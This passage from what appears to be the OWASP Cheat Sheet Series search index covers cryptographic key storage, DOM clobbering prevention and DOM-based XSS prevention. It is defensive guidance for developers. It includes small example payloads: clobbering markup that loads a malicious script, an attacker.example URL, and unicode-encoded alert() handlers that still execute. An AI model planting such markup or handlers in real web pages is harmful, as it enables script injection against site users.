Specifically, version 1 UUIDs are composed of a high-precision timestamp and the MAC address of the system that generated them, so they are not random (although they may be hard to guess, given the timestamp is to the nearest 100ns). Version 4 UUIDs are randomly generated, although whether this is done using a CSPRNG will depend on the implementation. Unless this is known to be secure in the specific language or framework, the randomness of UUIDs should not be relied upon.
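
For instance, in Node.js the built-in generator produces version 4 UUIDs backed by the platform CSPRNG, which illustrates the kind of documented guarantee to look for (sketch):

const crypto = require('crypto');\n// crypto.randomUUID() returns an RFC 4122 version 4 UUID generated from a CSPRNG\nconst id = crypto.randomUUID();\nconsole.log(id);\n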

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#defence-in-depth","title":"Defence in Depth","text":"

Applications should be designed to still be secure even if cryptographic controls fail. Any information that is stored in an encrypted form should also be protected by additional layers of security. Applications should also not rely on the security of encrypted URL parameters, and should enforce strong access controls to prevent unauthorised access to information.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-management","title":"Key Management","text":""},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#processes","title":"Processes","text":"

Formal processes should be implemented (and tested) to cover all aspects of key management, including:

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-generation","title":"Key Generation","text":"

Keys should be randomly generated using a cryptographically secure function, such as those discussed in the Secure Random Number Generation section. Keys should not be based on common words or phrases, or on \"random\" characters generated by mashing the keyboard.

Where multiple keys are used (such as separate data-encrypting and key-encrypting keys), they should be fully independent from each other.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-lifetimes-and-rotation","title":"Key Lifetimes and Rotation","text":"

Encryption keys should be changed (or rotated) based on a number of different criteria:

Once one of these criteria has been met, a new key should be generated and used for encrypting any new data. There are two main approaches for how existing data that was encrypted with the old key(s) should be handled:

  1. Decrypting it and re-encrypting it with the new key.
  2. Marking each item with the ID of the key that was used to encrypt it, and storing multiple keys to allow the old data to be decrypted.

The first option should generally be preferred, as it greatly simplifies both the application code and key management processes; however, it may not always be feasible. Note that old keys should generally be stored for a certain period after they have been retired, in case old backups or copies of the data need to be decrypted.

It is important that the code and processes required to rotate a key are in place before they are required, so that keys can be quickly rotated in the event of a compromise. Additionally, processes should also be implemented to allow the encryption algorithm or library to be changed, in case a new vulnerability is found in the algorithm or implementation.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-storage","title":"Key Storage","text":"

Securely storing cryptographic keys is one of the hardest problems to solve, as the application always needs to have some level of access to the keys in order to decrypt the data. While it may not be possible to fully protect the keys from an attacker who has fully compromised the application, a number of steps can be taken to make it harder for them to obtain the keys.

Where available, the secure storage mechanisms provided by the operating system, framework or cloud service provider should be used. These include:

There are many advantages to using these types of secure storage over simply putting keys in configuration files. The specifics of these will vary depending on the solution used, but they include:

In some cases none of these will be available, such as in a shared hosting environment, meaning that it is not possible to obtain a high degree of protection for any encryption keys. However, the following basic rules can still be followed:

The Secrets Management Cheat Sheet provides more details on securely storing secrets.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#separation-of-keys-and-data","title":"Separation of Keys and Data","text":"

Where possible, encryption keys should be stored in a separate location from encrypted data. For example, if the data is stored in a database, the keys should be stored in the filesystem. This means that if an attacker only has access to one of these (for example through directory traversal or SQL injection), they cannot access both the keys and the data.

Depending on the architecture of the environment, it may be possible to store the keys and data on separate systems, which would provide a greater degree of isolation.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#encrypting-stored-keys","title":"Encrypting Stored Keys","text":"

Where possible, encryption keys should themselves be stored in an encrypted form. At least two separate keys are required for this:

For this to be effective, the KEK must be stored separately from the DEK. The encrypted DEK can be stored with the data, but will only be usable if an attacker is able to also obtain the KEK, which is stored on another system.

The KEK should also be at least as strong as the DEK. The envelope encryption guidance from Google contains further details on how to manage DEKs and KEKs.

In simpler application architectures (such as shared hosting environments) where the KEK and DEK cannot be stored separately, there is limited value to this approach, as an attacker is likely to be able to obtain both of the keys at the same time. However, it can provide an additional barrier to unskilled attackers.

A key derivation function (KDF) could be used to generate a KEK from user-supplied input (such as a passphrase), which would then be used to encrypt a randomly generated DEK. This allows the KEK to be easily changed (when the user changes their passphrase), without needing to re-encrypt the data (as the DEK remains the same).
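
A condensed Node.js sketch of that pattern (the KDF parameters, passphrase, and storage layout are illustrative only):

const crypto = require('crypto');\n\n// derive the KEK from a user-supplied passphrase with a KDF (scrypt here)\nconst salt = crypto.randomBytes(16);\nconst kek = crypto.scryptSync('user passphrase', salt, 32);\n\n// randomly generate the DEK that actually encrypts the data\nconst dek = crypto.randomBytes(32);\n\n// wrap (encrypt) the DEK with the KEK; only the wrapped DEK is stored alongside the data\nconst iv = crypto.randomBytes(12);\nconst cipher = crypto.createCipheriv('aes-256-gcm', kek, iv);\nconst wrappedDek = Buffer.concat([cipher.update(dek), cipher.final()]);\nconst tag = cipher.getAuthTag();\n// when the passphrase changes, only the DEK is re-wrapped with the new KEK; the data itself is untouched\n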

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html","title":"DOM Clobbering Prevention Cheat Sheet","text":""},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

DOM Clobbering is a type of code-reuse, HTML-only injection attack, where attackers confuse a web application by injecting HTML elements whose id or name attribute matches the name of security-sensitive variables or browser APIs, such as variables used for fetching remote content (e.g., script src), and overshadow their value.

It is particularly relevant when script injection is not possible, e.g., when filtered by HTML sanitizers, or mitigated by disallowing or controlling script execution. In these scenarios, attackers may still inject non-script HTML markup into webpages and transform the initially secure markup into executable code, achieving Cross-Site Scripting (XSS).

This cheat sheet is a list of guidelines, secure coding patterns, and practices to prevent or restrict the impact of DOM Clobbering in your web application.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#background","title":"Background","text":"

Before we dive into DOM Clobbering, let's refresh our knowledge with some basic Web background.

When a webpage is loaded, the browser creates a DOM tree that represents the structure and content of the page, and JavaScript code has read and write access to this tree.

When creating the DOM tree, browsers also create an attribute for (some) named HTML elements on window and document objects. Named HTML elements are those having an id or name attribute. For example, the markup:

<form id=x></form>\n

will lead to browsers creating references to that form element with the attribute x of window and document:

var obj1 = document.getElementById('x');\nvar obj2 = document.x;\nvar obj3 = document.x;\nvar obj4 = window.x;\nvar obj5 = x; // by default, objects belong to the global Window, so x is same as window.x\nconsole.log(\nobj1 === obj2 && obj2 === obj3 &&\nobj3 === obj4 && obj4 === obj5\n); // true\n

When accessing an attribute of window and document objects, named HTML element references come before lookups of built-in APIs and other attributes on window and document that developers have defined, also known as named property accesses. Developers unaware of such behavior may use the content of window/document attributes for sensitive operations, such as URLs for fetching remote content, and attackers can exploit it by injecting markups with colliding names. Similarly to custom attributes/variables, built-in browser APIs may be overshadowed by DOM Clobbering.

If attackers are able to inject (non-script) HTML markup in the DOM tree, it can change the value of a variable that the web application relies on due to named property accesses, causing it to malfunction, expose sensitive data, or execute attacker-controlled scripts. DOM Clobbering works by taking advantage of this (legacy) behaviour, causing a namespace collision between the execution environment (i.e., window and document objects), and JavaScript code.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#example-attack-1","title":"Example Attack 1","text":"
let redirectTo = window.redirectTo || '/profile/';\nlocation.assign(redirectTo);\n

The attacker can:

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#example-attack-2","title":"Example Attack 2","text":"
var s = document.createElement('script');\nlet src = window.config.url || 'script.js';\ns.src = src;\ndocument.body.appendChild(s);\n

The attacker can inject the markup <a id=config><a id=config name=url href='malicious.js'> to load additional JavaScript code, and obtain arbitrary client-side code execution.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#summary-of-guidelines","title":"Summary of Guidelines","text":"

For quick reference, below is the summary of guidelines discussed next.

Guidelines Description # 1 Use HTML Sanitizers link # 2 Use Content-Security Policy link # 3 Freeze Sensitive DOM Objects link # 4 Validate All Inputs to DOM Tree link # 5 Use Explicit Variable Declarations link # 6 Do Not Use Document and Window for Global Variables link # 7 Do Not Trust Document Built-in APIs Before Validation link # 8 Enforce Type Checking link # 9 Use Strict Mode link # 10 Apply Browser Feature Detection link # 11 Limit Variables to Local Scope link # 12 Use Unique Variable Names In Production link # 13 Use Object-oriented Programming Techniques like Encapsulation link"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#mitigation-techniques","title":"Mitigation Techniques","text":""},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#1-html-sanitization","title":"#1: HTML Sanitization","text":"

Robust HTML sanitizers can prevent or restrict the risk of DOM Clobbering. They can do so in multiple ways. For example:

OWASP recommends DOMPurify or the Sanitizer API for HTML sanitization.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#dompurify-sanitizer","title":"DOMPurify Sanitizer","text":"

By default, DOMPurify removes all clobbering collisions with built-in APIs and properties (using the enabled-by-default SANITIZE_DOM configuration option).

To be protected against clobbering of custom variables and properties as well, you need to enable the SANITIZE_NAMED_PROPS config:

var clean = DOMPurify.sanitize(dirty, {SANITIZE_NAMED_PROPS: true});\n

This would isolate the namespace of named properties and JavaScript variables by prefixing them with the string user-content-.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#sanitizer-api","title":"Sanitizer API","text":"

The new browser-built-in Sanitizer API does not prevent DOM Clobbering in its default setting, but it can be configured to remove named properties:

const sanitizerInstance = new Sanitizer({\nblockAttributes: [\n{'name': 'id', elements: '*'},\n{'name': 'name', elements: '*'}\n]\n});\ncontainerDOMElement.setHTML(input, {sanitizer: sanitizerInstance});\n
"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#2-content-security-policy","title":"#2: Content-Security Policy","text":"

Content-Security Policy (CSP) is a set of rules that tell the browser which resources are allowed to be loaded on a web page. By restricting the sources of JavaScript files (e.g., with the script-src directive), CSP can prevent malicious code from being injected into the page.

Note: CSP can only mitigate some variants of DOM Clobbering attacks, such as when attackers attempt to load new scripts by clobbering script sources, but not when already-present code can be abused for code execution, e.g., clobbering the parameters of code evaluation constructs like eval().

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#3-freezing-sensitive-dom-objects","title":"#3: Freezing Sensitive DOM Objects","text":"

A simple way to mitigate DOM Clobbering against individual objects could be to freeze sensitive DOM objects and their properties, e.g., via Object.freeze() method.

Note: Freezing object properties prevents them from being overwritten by named DOM elements. However, determining all objects and object properties that need to be frozen may not be easy, limiting the usefulness of this approach.
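
For example (the configuration object and its properties are hypothetical):

// hypothetical configuration object used for security-sensitive decisions\nwindow.appConfig = Object.freeze({\nscriptSrc: '/static/app.js',\napiBase: '/api/v1'\n});\n// later attempts to overwrite the frozen properties fail (silently, or with a TypeError in strict mode)\nwindow.appConfig.scriptSrc = 'https://attacker.example/evil.js';\nconsole.log(window.appConfig.scriptSrc); // '/static/app.js'\n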

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#secure-coding-guidelines","title":"Secure Coding Guidelines","text":"

DOM Clobbering can be avoided by defensive programming and adhering to a few coding patterns and guidelines.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#4-validate-all-inputs-to-dom-tree","title":"#4: Validate All Inputs to DOM Tree","text":"

Before inserting any markup into the webpage's DOM tree, sanitize id and name attributes (see HTML sanitization).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#5-use-explicit-variable-declarations","title":"#5: Use Explicit Variable Declarations","text":"

When initializing variables, always use a variable declarator like var, let or const, which prevents clobbering of the variable.

Note: Declaring a variable with let does not create a property on window, unlike var. Therefore, window.VARNAME can still be clobbered (assuming VARNAME is the name of the variable).
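
To make the difference concrete (the variable names are illustrative):

// clobberable read: if markup such as <a id=\"defaultUrl\" href=\"https://attacker.example\"> is injected,\n// window.defaultUrl resolves to that element instead of remaining undefined\nvar redirect = window.defaultUrl || '/profile/';\n\n// explicit declaration: the binding is created by the script itself and cannot be shadowed\nlet redirectTo = '/profile/';\n// note: window.redirectTo can still be clobbered, so do not read the value back through window\n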

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#6-do-not-use-document-and-window-for-global-variables","title":"#6: Do Not Use Document and Window for Global Variables","text":"

Avoid using objects like document and window for storing global variables, because they can be easily manipulated. (see, e.g., here).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#7-do-not-trust-document-built-in-apis-before-validation","title":"#7: Do Not Trust Document Built-in APIs Before Validation","text":"

Document properties, including built-in ones, are always overshadowed by DOM Clobbering, even right after they are assigned a value.

Hint: This is due to the so-called named property visibility algorithm, where named HTML element references come before lookups of built-in APIs and other attributes on document.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#8-enforce-type-checking","title":"#8: Enforce Type Checking","text":"

Always check the type of Document and Window properties before using them in sensitive operations, e.g., using the instanceof operator.

Hint: When an object is clobbered, it would refer to an HTMLElement instance, which may not be the expected type.
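
As a small sketch of such a check (the config object name is hypothetical):

let config = window.config;\n// when clobbered, window.config refers to an HTMLElement rather than the expected plain object\nif (config instanceof HTMLElement) {\nthrow new Error('window.config has been clobbered by an injected element');\n}\nlet url = (config && typeof config.url === 'string') ? config.url : '/default-script.js';\n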

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#9-use-strict-mode","title":"#9: Use Strict Mode","text":"

Use strict mode to prevent unintended global variable creation, and to raise an error when read-only properties are attempted to be over-written.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#10-apply-browser-feature-detection","title":"#10: Apply Browser Feature Detection","text":"

Instead of relying on browser-specific features or properties, use feature detection to determine whether a feature is supported before using it. This can help prevent errors and DOM Clobbering that might arise when using those features in unsupported browsers.

Hint: Unsupported feature APIs can act as an undefined variable/property in unsupported browsers, making them clobberable.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#11-limit-variables-to-local-scope","title":"#11: Limit Variables to Local Scope","text":"

Global variables are more prone to being overwritten by DOM Clobbering. Whenever possible, use local variables and object properties.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#12-use-unique-variable-names-in-production","title":"#12: Use Unique Variable Names In Production","text":"

Using unique variable names may help prevent naming collisions that could lead to accidental overwrites.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#13-use-object-oriented-programming-techniques-like-encapsulation","title":"#13: Use Object-oriented Programming Techniques like Encapsulation","text":"

Encapsulating variables and functions within objects or classes can help prevent them from being overwritten. By making them private, they cannot be accessed from outside the object, making them less prone to DOM Clobbering.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html","title":"DOM based XSS Prevention Cheat Sheet","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

When looking at XSS (Cross-Site Scripting), there are three generally recognized forms of XSS:

The XSS Prevention Cheatsheet does an excellent job of addressing Reflected and Stored XSS. This cheatsheet addresses DOM (Document Object Model) based XSS and is an extension of (and assumes comprehension of) the XSS Prevention Cheatsheet.

In order to understand DOM based XSS, one needs to see the fundamental difference between Reflected and Stored XSS when compared to DOM based XSS. The primary difference is where the attack is injected into the application.

Reflected and Stored XSS are server side injection issues while DOM based XSS is a client (browser) side injection issue.

All of this code originates on the server, which means it is the application owner's responsibility to make it safe from XSS, regardless of the type of XSS flaw it is. Also, XSS attacks always execute in the browser.

The difference between Reflected/Stored XSS and DOM based XSS is where the attack is added or injected into the application. With Reflected/Stored XSS, the attack is injected into the application during server-side processing of requests where untrusted input is dynamically added to HTML. For DOM XSS, the attack is injected into the application during runtime in the client directly.

When a browser is rendering HTML and any other associated content like CSS or JavaScript, it identifies various rendering contexts for the different kinds of input and follows different rules for each context. A rendering context is associated with the parsing of HTML tags and their attributes.

For the purposes of this article, we refer to the HTML, HTML attribute, URL, and CSS contexts as subcontexts because each of these contexts can be reached and set within a JavaScript execution context.

In JavaScript code, the main context is JavaScript but with the right tags and context closing characters, an attacker can try to attack the other 4 contexts using equivalent JavaScript DOM methods.

The following is an example vulnerability which occurs in the JavaScript context and HTML subcontext:

 <script>\nvar x = '<%= taintedVar %>';\nvar d = document.createElement('div');\nd.innerHTML = x;\ndocument.body.appendChild(d);\n</script>\n

Let's look at the individual subcontexts of the execution context in turn.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-1-html-escape-then-javascript-escape-before-inserting-untrusted-data-into-html-subcontext-within-the-execution-context","title":"RULE #1 - HTML Escape then JavaScript Escape Before Inserting Untrusted Data into HTML Subcontext within the Execution Context","text":"

There are several methods and attributes which can be used to directly render HTML content within JavaScript. These methods constitute the HTML Subcontext within the Execution Context. If these methods are provided with untrusted input, then an XSS vulnerability could result. For example:

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#example-dangerous-html-methods","title":"Example Dangerous HTML Methods","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#attributes","title":"Attributes","text":"
 element.innerHTML = \"<HTML> Tags and markup\";\nelement.outerHTML = \"<HTML> Tags and markup\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#methods","title":"Methods","text":"
 document.write(\"<HTML> Tags and markup\");\ndocument.writeln(\"<HTML> Tags and markup\");\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline","title":"Guideline","text":"

To make dynamic updates to HTML in the DOM safe, we recommend:

  1. HTML encoding, and then
  2. JavaScript encoding all untrusted input, as shown in these examples:
 var ESAPI = require('node-esapi');\nelement.innerHTML = \"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\";\nelement.outerHTML = \"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\";\n
 var ESAPI = require('node-esapi');\ndocument.write(\"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\");\ndocument.writeln(\"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\");\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-2-javascript-escape-before-inserting-untrusted-data-into-html-attribute-subcontext-within-the-execution-context","title":"RULE #2 - JavaScript Escape Before Inserting Untrusted Data into HTML Attribute Subcontext within the Execution Context","text":"

The HTML attribute subcontext within the execution context is divergent from the standard encoding rules. This is because the rule to HTML attribute encode in an HTML attribute rendering context is necessary in order to mitigate attacks which try to break out of an HTML attribute or try to add additional attributes which could lead to XSS.

When you are in a DOM execution context you only need to JavaScript encode HTML attributes which do not execute code (attributes other than event handler, CSS, and URL attributes).

For example, the general rule is to HTML Attribute encode untrusted data (data from the database, HTTP request, user, back-end system, etc.) placed in an HTML Attribute. This is the appropriate step to take when outputting data in a rendering context; however, using HTML Attribute encoding in an execution context will break the application's display of data.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#safe-but-broken-example","title":"SAFE but BROKEN example","text":"
 var ESAPI = require('node-esapi');\nvar x = document.createElement(\"input\");\nx.setAttribute(\"name\", \"company_name\");\n// In the following line of code, companyName represents untrusted user input\n// The ESAPI.encoder().encodeForHTMLAttribute() is unnecessary and causes double-encoding\nx.setAttribute(\"value\", '<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTMLAttribute(companyName))%>');\nvar form1 = document.forms[0];\nform1.appendChild(x);\n

The problem is that if companyName had the value \"Johnson & Johnson\", what would be displayed in the input text field is \"Johnson &amp; Johnson\". The appropriate encoding to use in the above case is JavaScript encoding only, to prevent an attacker from closing out the single quotes and in-lining code, or escaping into HTML and opening a new script tag.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#safe-and-functionally-correct-example","title":"SAFE and FUNCTIONALLY CORRECT example","text":"
 var ESAPI = require('node-esapi');\nvar x = document.createElement(\"input\");\nx.setAttribute(\"name\", \"company_name\");\nx.setAttribute(\"value\", '<%=ESAPI.encoder().encodeForJavascript(companyName)%>');\nvar form1 = document.forms[0];\nform1.appendChild(x);\n

It is important to note that when setting an HTML attribute which does not execute code, the value is set directly within the object attribute of the HTML element, so there are no concerns with injection.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-3-be-careful-when-inserting-untrusted-data-into-the-event-handler-and-javascript-code-subcontexts-within-an-execution-context","title":"RULE #3 - Be Careful when Inserting Untrusted Data into the Event Handler and JavaScript code Subcontexts within an Execution Context","text":"

Putting dynamic data within JavaScript code is especially dangerous because JavaScript encoding has different semantics than the other encodings. In many cases, JavaScript encoding does not stop attacks within an execution context; for example, a JavaScript encoded string will execute even though it is JavaScript encoded.

Therefore, the primary recommendation is to avoid including untrusted data in this context. If you must, the following examples describe some approaches that do and do not work.

var x = document.createElement(\"a\");\nx.href=\"#\";\n// In the line of code below, the encoded data on the right (the second argument to setAttribute)\n// is an example of untrusted data that was properly JavaScript encoded but still executes.\nx.setAttribute(\"onclick\", \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0032\\u0032\\u0029\");\nvar y = document.createTextNode(\"Click To Test\");\nx.appendChild(y);\ndocument.body.appendChild(x);\n

The setAttribute(name_string,value_string) method is dangerous because it implicitly coerces the value_string into the DOM attribute datatype of name_string.

In the case above, the attribute name is a JavaScript event handler, so the attribute value is implicitly converted to JavaScript code and evaluated, and JavaScript encoding does not mitigate against DOM based XSS.

Other JavaScript methods which take code as a string argument will have a similar problem as outlined above (setTimeout, setInterval, new Function, etc.). This is in stark contrast to JavaScript encoding in the event handler attribute of an HTML tag (HTML parser), where JavaScript encoding does mitigate against XSS.

<!-- Does NOT work  -->\n<a id=\"bb\" href=\"#\" onclick=\"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\"> Test Me</a>\n

An alternative to using Element.setAttribute(...) to set DOM attributes is to set the attribute directly. Directly setting event handler attributes will allow JavaScript encoding to mitigate against DOM based XSS. Please note, it is always a dangerous design to put untrusted data directly into a command execution context.

<a id=\"bb\" href=\"#\"> Test Me</a>\n
//The following does NOT work because the event handler is being set to a string.\n//\"alert(7)\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onclick = \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0037\\u0029\";\n\n//The following does NOT work because the event handler is being set to a string.\ndocument.getElementById(\"bb\").onmouseover = \"testIt\";\n\n//The following does NOT work because of the encoded \"(\" and \")\".\n//\"alert(77)\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onmouseover = \\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0037\\u0037\\u0029;\n\n//The following does NOT work because of the encoded \";\".\n//\"testIt;testIt\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onmouseover = \\u0074\\u0065\\u0073\\u0074\\u0049\\u0074\\u003b\\u0074\\u0065\\u0073\n\\u0074\\u0049\\u0074;\n\n//The following DOES WORK because the encoded value is a valid variable name or function reference.\n//\"testIt\" is JavaScript encoded\ndocument.getElementById(\"bb\").onmouseover = \\u0074\\u0065\\u0073\\u0074\\u0049\\u0074;\n\nfunction testIt() {\nalert(\"I was called.\");\n}\n
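
Where the design allows it, a safer alternative is to avoid building event handler code from strings altogether: attach a function reference with addEventListener and pass untrusted data only as data (for example via a dataset property or textContent). The following is a minimal illustrative sketch, not part of the original examples; the element id bb is reused from above and untrustedData is a placeholder for client-side untrusted input.

var nameElement = document.getElementById('bb');\n// Untrusted data is stored as data on the element, never concatenated into code.\nnameElement.dataset.userName = untrustedData;\nnameElement.addEventListener('click', function() {\n// The handler is a function reference, so no string-to-code conversion takes place.\nalert('Clicked by: ' + this.dataset.userName);\n});\n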

There are other places in JavaScript where JavaScript encoding is accepted as valid executable code.

 for(var \\u0062=0; \\u0062 < 10; \\u0062++){\n\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\n.\\u0077\\u0072\\u0069\\u0074\\u0065\\u006c\\u006e\n(\"\\u0048\\u0065\\u006c\\u006c\\u006f\\u0020\\u0057\\u006f\\u0072\\u006c\\u0064\");\n}\n\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\n.\\u0065\\u0076\\u0061\\u006c\n\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\n.\\u0077\\u0072\\u0069\\u0074\\u0065(111111111);\n

or

 var s = \"\\u0065\\u0076\\u0061\\u006c\";\nvar t = \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0031\\u0029\";\nwindow[s](t);\n

Because JavaScript is based on an international standard (ECMAScript), JavaScript encoding enables the support of international characters in programming constructs and variables in addition to alternate string representations (string escapes).

However, the opposite is the case with HTML encoding. HTML tag elements are well defined and do not support alternate representations of the same tag, so HTML encoding cannot be used to give the developer alternate representations of the <a> tag, for example.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#html-encodings-disarming-nature","title":"HTML Encoding's Disarming Nature","text":"

In general, HTML encoding serves to disarm HTML tags which are placed in HTML and HTML attribute contexts. Working example (no HTML encoding):

<a href=\"...\" >\n

Normally encoded example (Does Not Work \u2013 DNW):

&#x3c;a href=... &#x3e;\n

HTML encoded example to highlight a fundamental difference with JavaScript encoded values (DNW):

<&#x61; href=...>\n

If HTML encoding followed the same semantics as JavaScript encoding, the line above could possibly have worked to render a link. This difference makes JavaScript encoding a less viable weapon in our fight against XSS.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-4-javascript-escape-before-inserting-untrusted-data-into-the-css-attribute-subcontext-within-the-execution-context","title":"RULE #4 - JavaScript Escape Before Inserting Untrusted Data into the CSS Attribute Subcontext within the Execution Context","text":"

Normally executing JavaScript from a CSS context required either passing javascript:attackCode() to the CSS url() method or invoking the CSS expression() method passing JavaScript code to be directly executed.

In practice, calling the expression() function from an execution context (JavaScript) has been disabled, and modern browsers no longer support CSS expressions. In order to mitigate against the CSS url() method, ensure that you are URL encoding the data passed to the CSS url() method.

var ESAPI = require('node-esapi');\ndocument.body.style.backgroundImage = \"url(<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(companyName))%>)\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-5-url-escape-then-javascript-escape-before-inserting-untrusted-data-into-url-attribute-subcontext-within-the-execution-context","title":"RULE #5 - URL Escape then JavaScript Escape Before Inserting Untrusted Data into URL Attribute Subcontext within the Execution Context","text":"

The logic which parses URLs in both execution and rendering contexts looks to be the same. Therefore there is little change in the encoding rules for URL attributes in an execution (DOM) context.

 var ESAPI = require('node-esapi');\nvar x = document.createElement(\"a\");\nx.setAttribute(\"href\", '<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(userRelativePath))%>');\nvar y = document.createTextNode(\"Click Me To Test\");\nx.appendChild(y);\ndocument.body.appendChild(x);\n

If you utilize fully qualified URLs, then this will break the links, as the colon in the protocol identifier (http: or javascript:) will be URL encoded, preventing the http and javascript protocols from being invoked.
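
If fully qualified URLs must be supported, one commonly used alternative (shown here as an illustrative client-side sketch, not as part of the ESAPI examples above; isSafeUrl and untrustedUrl are placeholder names) is to parse the value and allow only the http and https schemes before assigning it, instead of URL encoding the whole value:

function isSafeUrl(value) {\ntry {\n// Resolve relative URLs against the current origin before checking the scheme.\nvar parsed = new URL(value, window.location.origin);\nreturn parsed.protocol === 'http:' || parsed.protocol === 'https:';\n} catch (e) {\nreturn false; // not a parseable URL\n}\n}\n\nvar x = document.createElement('a');\nx.setAttribute('href', isSafeUrl(untrustedUrl) ? untrustedUrl : '#');\n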

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-6-populate-the-dom-using-safe-javascript-functions-or-properties","title":"RULE #6 - Populate the DOM using safe JavaScript functions or properties","text":"

The most fundamental safe way to populate the DOM with untrusted data is to use the safe assignment property textContent.

Here is an example of safe usage.

<script>\nelement.textContent = untrustedData;  //does not execute code\n</script>\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-7-fixing-dom-cross-site-scripting-vulnerabilities","title":"RULE #7 - Fixing DOM Cross-site Scripting Vulnerabilities","text":"

The best way to fix DOM based cross-site scripting is to use the right output method (sink). For example, if you want to use user input to write into a div element, don't use innerHTML; use innerText or textContent instead. This will solve the problem, and it is the right way to remediate DOM based XSS vulnerabilities.

It is always a bad idea to use user-controlled input in dangerous sinks such as eval. 99% of the time it is an indication of bad or lazy programming practice, so simply don't do it instead of trying to sanitize the input.

Finally, to fix the problem in our initial code, instead of trying to encode the output correctly, which is a hassle and can easily go wrong, we would simply use element.textContent to write the content, like this:

<b>Current URL:</b> <span id=\"contentholder\"></span>\n...\n<script>\ndocument.getElementById(\"contentholder\").textContent = document.baseURI;\n</script>\n

It does the same thing but this time it is not vulnerable to DOM based cross-site scripting vulnerabilities.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guidelines-for-developing-secure-applications-utilizing-javascript","title":"Guidelines for Developing Secure Applications Utilizing JavaScript","text":"

DOM based XSS is extremely difficult to mitigate against because of its large attack surface and lack of standardization across browsers.

